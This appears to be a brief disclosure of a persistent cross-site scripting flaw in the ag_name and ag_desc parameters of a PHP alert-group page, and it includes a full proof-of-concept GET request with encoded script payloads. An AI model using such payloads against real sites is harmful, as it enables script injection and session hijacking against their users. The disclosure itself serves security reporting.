The POST request shown in Persistent-notes.txt can be replaced with a GET request. The attacker can choose to use the GET, always nice to have choice. The ag_name and ag_desc parameters do not have validation. === Request === GET /base/base_ag_main.php?ag_name=%3Cscript%3Ealert%28%22Name-XSS%22%29%3C%2Fscript%3E&ag_desc=%3Cscript%3Ealert%28%22Desc-XSS%22%29%3C%2Fscript%3E&submit=Create+Group&ag_action=create&caller=&num_result_rows=-1¤t_view=-1&=action_arg HTTP/1.1 Host: 172.16.105.130 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://172.16.105.130/base/base_ag_main.php?ag_action=create Cookie: PHPSESSID=dad4b449a7b0c4e0b397c29d960ae9c2 === Response === ...snip...

ID #	3
Name
Description

Create Group